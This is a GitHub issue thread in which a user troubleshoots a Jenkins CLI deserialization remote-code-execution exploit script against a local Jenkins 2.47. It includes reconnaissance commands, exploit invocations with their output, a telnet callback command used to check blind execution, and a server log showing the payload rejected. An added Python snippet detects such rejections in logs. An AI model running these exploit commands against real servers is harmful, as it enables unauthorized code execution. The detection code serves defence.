python error with exploit setup
thesrinivas opened this issue · 12 comments
I see this error when trying to set up an env for this exploit. This is on an Ubuntu 14.04 with nginx. Please let me know if I'm missing something here.
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:80 w
[*] Target IP: localhost
[*] Target PORT: 80
[*] Retrieving the Jenkins CLI port
Traceback (most recent call last):
File "jenkins_cli_rmi_rce.py", line 62, in <module>
cli_port = int(r.headers['X-Jenkins-CLI-Port'])
File "/usr/local/lib/python2.7/dist-packages/requests/structures.py", line 54, in __getitem__
return self._store[key.lower()][1]
KeyError: 'x-jenkins-cli-port'
Hi,
Seems like the script is unable to retrieve the Jenkins CLI port from the HTTP headers.
What version of Jenkins are you running this against? Also can you paste the output of
curl -v http://localhost:80
Thanks
The output below shows Jenkins - 2.47.
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# curl -x '' -v http://localhost:8080
* Rebuilt URL to: http://localhost:8080/
* Hostname was NOT found in DNS cache
*   Trying ::1...
* Connected to localhost (::1) port 8080 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.35.0
> Host: localhost:8080
> Accept: */*
< HTTP/1.1 403 Forbidden
< Date: Thu, 26 Jan 2017 06:51:05 GMT
< X-Content-Type-Options: nosniff
< Set-Cookie: JSESSIONID.b1a2c03f=ymdnbb154xig25443mynliqn;Path=/;HttpOnly
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< Content-Type: text/html;charset=UTF-8
< X-Hudson: 1.395
< X-Jenkins: 2.47
< X-Jenkins-Session: a057be57
< X-You-Are-Authenticated-As: anonymous
< X-You-Are-In-Group-Disabled: JENKINS-39402: use -Dhudson.security.AccessDeniedException2.REPORT_GROUP_HEADERS=true or use /whoAmI to diagnose
< X-Required-Permission: hudson.model.Hudson.Read
< X-Permission-Implied-By: hudson.security.Permission.GenericRead
< X-Permission-Implied-By: hudson.model.Hudson.Administer
< Content-Length: 793
* Server Jetty(9.2.z-SNAPSHOT) is not blacklisted
< Server: Jetty(9.2.z-SNAPSHOT)
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# curl -x '' -v http://localhost:80
* Rebuilt URL to: http://localhost:80/
* Hostname was NOT found in DNS cache
*   Trying ::1...
* Connected to localhost (::1) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.35.0
> Host: localhost
> Accept: */*
< HTTP/1.1 200 OK
* Server nginx/1.4.6 (Ubuntu) is not blacklisted
< Server: nginx/1.4.6 (Ubuntu)
< Date: Fri, 27 Jan 2017 01:35:24 GMT
< Content-Type: text/html
< Content-Length: 612
< Last-Modified: Tue, 04 Mar 2014 11:46:45 GMT
< Connection: keep-alive
< ETag: "5315bd25-264"
< Accept-Ranges: bytes
<
Welcome to nginx!
If you see this page, the nginx web server is successfully installed and working. Further configuration is required.
For online documentation and support please refer to
nginx.org.
Commercial support is available at
nginx.com.
Thank you for using nginx.
* Connection #0 to host localhost left intact
@thesrinivas seems like your Jenkins install isn't returning the X-Jenkins-CLI-Port HTTP header (which is required for the exploit to work). Can you do a full nmap scan of the target host to check if the port is open?
Turned off all security setting on Jenkins. Here's the nmap scan. What is the Jenkins CLI port that needs to be open?
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# nmap -sT localhost
Starting Nmap 6.40 ( http://nmap.org ) at 2017-01-26 17:52 PST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00029s latency).
Other addresses for localhost (not scanned): 127.0.0.1
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
Works now. What are the recommended Jenkins security settings for this exploit to work?
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:8080 w
[*] Target IP: localhost
[*] Target PORT: 8080
[*] Retrieving the Jenkins CLI port
[*] Connecting to Jenkins CLI on localhost:38539
[*] Sending headers
[*] Received "Welcome
"
[*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
[+] Sent payload
All exploits were tested against Jenkins installations with default settings
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:8080 w
[*] Target IP: localhost
[*] Target PORT: 8080
[*] Retrieving the Jenkins CLI port
[*] Connecting to Jenkins CLI on localhost:38539
[*] Sending headers
[*] Received "Welcome
"
[*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
[+] Sent payload
Can you confirm if this test result shows the exploit working? The test result above doesn't show the command 'w' output.
It's a blind RCE, you won't be able to get the command output. Try running tcpdump and pinging your machine to verify the exploit is working.
Jenkins log file has the following:
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:8080 w
[*] Target IP: localhost
[*] Target PORT: 8080
[*] Retrieving the Jenkins CLI port
[*] Connecting to Jenkins CLI on localhost:38539
[*] Sending headers
Jan 26, 2017 6:30:47 PM hudson.TcpSlaveAgentListener$ConnectionHandler run
INFO: Accepted connection #11 from /127.0.0.1:41468
[*] Received "Welcome
"
[*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
Jan 26, 2017 6:30:47 PM hudson.init.impl.InstallUncaughtExceptionHandler$DefaultUncaughtExceptionHandler uncaughtException
SEVERE: A thread (TCP agent connection handler #11 with /127.0.0.1:41468/80) died unexpectedly due to an uncaught exception, this may leave your Jenkins in a bad way and is usually indicative of a bug in the code.
java.lang.SecurityException: Rejected: sun.reflect.annotation.AnnotationInvocationHandler
at hudson.remoting.Capability$1.resolveClass(Capability.java:137)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1817)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1711)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1982)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1533)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:420)
at hudson.remoting.Capability.read(Capability.java:140)
at hudson.remoting.ChannelBuilder.negotiate(ChannelBuilder.java:391)
at hudson.remoting.ChannelBuilder.build(ChannelBuilder.java:310)
at hudson.cli.CliProtocol$Handler.runCli(CliProtocol.java:95)
at hudson.cli.CliProtocol$Handler.run(CliProtocol.java:82)
at hudson.cli.CliProtocol.handle(CliProtocol.java:58)
at hudson.TcpSlaveAgentListener$ConnectionHandler.run(TcpSlaveAgentListener.java:230)
[+] Sent payload
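The `java.lang.SecurityException: Rejected: sun.reflect.annotation.AnnotationInvocationHandler` line in the log above is Jenkins remoting's class filter refusing to deserialize the gadget class during the CLI handshake, which makes it a useful detection signal for blocked deserialization attempts against the CLI port. The following is an added example (not part of this repository or of Jenkins) that correlates the `Accepted connection #N from /ip:port` line with the `Rejected:` exception that follows it; the sample log is constructed from the lines quoted in this thread.

```python
import re

# Constructed sample, modelled on the Jenkins log lines quoted in this thread.
# Connection #11 is rejected by the class filter; connection #15 is not.
SAMPLE_LOG = """\
Jan 26, 2017 6:30:47 PM hudson.TcpSlaveAgentListener$ConnectionHandler run
INFO: Accepted connection #11 from /127.0.0.1:41468
Jan 26, 2017 6:30:47 PM hudson.init.impl.InstallUncaughtExceptionHandler$DefaultUncaughtExceptionHandler uncaughtException
SEVERE: A thread (TCP agent connection handler #11 with /127.0.0.1:41468/80) died unexpectedly due to an uncaught exception, this may leave your Jenkins in a bad way and is usually indicative of a bug in the code.
java.lang.SecurityException: Rejected: sun.reflect.annotation.AnnotationInvocationHandler
\tat hudson.remoting.Capability$1.resolveClass(Capability.java:137)
\tat java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1817)
Jan 26, 2017 6:47:48 PM hudson.TcpSlaveAgentListener$ConnectionHandler run
INFO: Accepted connection #15 from /127.0.0.1:41626
"""

# The TCP agent listener logs every accepted connection with an id and peer address.
ACCEPTED_RE = re.compile(r"^INFO: Accepted connection #(\d+) from /(\S+?):(\d+)$")
# When the handler thread dies, the SEVERE line names the same connection id.
DIED_RE = re.compile(r"^SEVERE: A thread \(TCP agent connection handler #(\d+) with /(\S+?):(\d+)")
# The remoting class filter reports the blocked class on the exception line.
REJECTED_RE = re.compile(r"^java\.lang\.SecurityException: Rejected: (\S+)$")


def find_rejected_deserializations(log_text):
    """Return one alert per CLI connection whose handshake was rejected by
    the remoting class filter, with the peer address taken from the matching
    'Accepted connection' line."""
    connections = {}  # connection id -> (peer ip, peer port)
    pending = None    # id of the handler whose thread just died
    alerts = []
    for line in log_text.splitlines():
        m = ACCEPTED_RE.match(line)
        if m:
            connections[int(m.group(1))] = (m.group(2), int(m.group(3)))
            continue
        m = DIED_RE.match(line)
        if m:
            pending = int(m.group(1))
            continue
        m = REJECTED_RE.match(line)
        if m and pending is not None:
            ip, port = connections.get(pending, ("unknown", 0))
            alerts.append({"connection": pending, "src_ip": ip,
                           "src_port": port, "rejected_class": m.group(1)})
            pending = None
    return alerts
```

Run it over a real Jenkins log to list which peers had a serialized class blocked during the CLI handshake; a rejection from an unexpected source address is worth investigating even though the attempt itself failed.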
Don't think the exploit is working on my setup but I may be missing something obvious.
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:8080 'telnet 10.0.2.15 8081'
[*] Target IP: localhost
[*] Target PORT: 8080
[*] Retrieving the Jenkins CLI port
[*] Connecting to Jenkins CLI on localhost:38539
[*] Sending headers
Jan 26, 2017 6:47:48 PM hudson.TcpSlaveAgentListener$ConnectionHandler run
INFO: Accepted connection #15 from /127.0.0.1:41626
[*] Received "Welcome
"
[*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
Nothing on tcpdump:
root@appserver:~# tcpdump port 8081 -i any
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes